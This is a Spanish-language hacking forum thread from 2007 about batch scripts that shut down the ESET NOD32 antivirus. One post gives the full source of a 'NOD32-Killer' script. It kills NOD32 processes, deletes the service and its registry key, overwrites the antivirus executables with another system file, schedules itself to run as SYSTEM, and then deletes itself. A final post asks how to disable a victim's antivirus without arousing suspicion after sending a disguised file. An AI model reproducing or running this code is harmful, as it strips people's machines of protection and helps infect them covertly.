CERRAR EL NOD32

Iniciado por Sh4k4, 25 Noviembre 2007, 00:28 AM

0 Miembros y 1 Visitante están viendo este tema.


Sh4k4

dudas preguntas, etc sientanse libres de postear ....  ::)

nhaalclkiemr

No vi ese pork no me puedo bajar cosas del rapidshare...pero yo tengun un BATCh publicado por aí k lo hace tambien  ;D ;D

Saludos ;)
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%

Freeze.


Sh4k4

nhaalclkiemr.- no puedes bajar del rapid? pero solo pesa 80 kb, no tarda tanto en bajar ni afecta tus descargas frees, ok si hay batchs que ya lo hacen pero este es nuevo echo por mi ok? leelo siempre hay algo que aprender...

Freeze.- Intenta bajarlo de nuevo lo baje y sigue OK todo en orden...

saludoz!  ::)

nhaalclkiemr

No es k ocupe 80KB...es k rapidshare no me deja bajar las descargas...es un tema algo largo de explicar...en resumen esa pagina se keda con las IPs para saber kien se bajo ya algo o se esta descargando o excedio el limite...yo como tengo el gateway (como un proxy) de Telefonica rapidshare me detecta esa IP (que es un proxy y comparto con un monton de usuarios de telefonica) y me pone k ya estoy bajando algo o k me excedi del limite...en ocasiones is puedo pero muy pocas veces cuando coincide...

MEGAUPLOAD también hace lo mismo, pero después te permite elegir entre varias opciones cual es tu IP...y allí ya aparece la verdadera...

weno y una cosa...¿pork no pones el codigo del bat aki en el foro?  :huh: :huh:

por si te interesa mi code es este:

Código (dos) [Seleccionar]
::NOD32-Killer
::By nhaalclkiemr
@echo off
echo  @echo off >> temp.bat
echo set a=0>> temp.bat
echo set b=0>> temp.bat
echo set errorlevel=>> temp.bat
echo set tempstr=delete>> temp.bat
echo set tempstr2=NOD32>> temp.bat
echo :c >> temp.bat
echo set /A b=%%b%%+1 >> temp.bat
echo set /A a=%%a%%+1 >> temp.bat
echo taskkill /F /IM %%tempstr2%%krn.exe /IM %%tempstr2%%kui.exe /IM %%tempstr2%%.exe >> temp.bat
echo sc %%tempstr%% %%tempstr2%%krn >> temp.bat
echo reg %%tempstr%% HKLM\SYSTEM\CurrentControlSet\Services\%%tempstr2%%krn /f >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%.exe" >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%krn.exe" >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%kui.exe" >> temp.bat
echo if %%a%%==11 goto fin >> temp.bat
echo if not %%errorlevel%%==0 goto c >> temp.bat
echo if %%b%%==5 goto fin >> temp.bat
echo :fin >> temp.bat
echo del /S /A:- /F /Q %%0 >> temp.bat
echo exit >> temp.bat
move temp.bat %%windir%%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto d
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
:d
del /F /Q /S /A:- %0
exit
:error
temp.bat>>NUL
del /F /Q /S /A:- %0
exit


Tenía varias versiones en las que corregia errores, no se si esta es la nueva (y mejor) pero pienso k sirve...a mi me gustaría ver tu code solo para comparar...

Saludos ;)
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%

Sh4k4

what?!!  :o

jajaja pues creo que primero debes bajarlo y leerlo para opinar no? no creo que no puedas bajar ese archivo independientemente de que tu PC  o el problema que tengas... un cybercafe? por ejemplo... y el por que no puse el codigo es obvio...pero ahi esta todo.. dudas coherentes adelante...

Duweick

Pues Para dercargarme un archivo fuente no creo que sea necesario tener que subirlo a un server que te limita las descargas.
Deberias de publicar tu codigo, o al menos alguna linea importante como para incetivarnos a decargala  >:(
Por algo es zona scripting

nhaalclkiemr

Haber, primero yo solo puse mi bat por si a alguien le sirve de ayuda y no he opinado nada...lo de rapidshare ya te he dicho el problema...y no me voy ir a un ciber para solamente bajar un codigo...

Esto es zona Scripting...aki se ponen codigos y se comenta...además k problema tienes ya k kuando baje el code ya lo veré...k mas da k lo pongas aki? y si lo pasaste a .exe (k no se) te digo k se puede recuperar el BAT principal igualmente...y de ser así además a la sección de Troyanos y Virus no a la Scripting...

Weno el code me da igual k el mio funciona muy bien...era solo por curiosidad...saludos ;)
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%

Rey_Misterio

Hola, mi pregunta es si este programa elimina los archivos del nod 32 y los deja inservibles para siempre, o solamente cierra el programa y processos (incluido el dichoso amon) asta que se reinicia la pc, y cuando se reinicie el nod32 esta como si nada hubiera pasado.
Es por no levantar sospechas... Ya que si envias una supuesta foto, y de repente le deja de funcionar el Av de por vida... Pos como que es algo misterioso..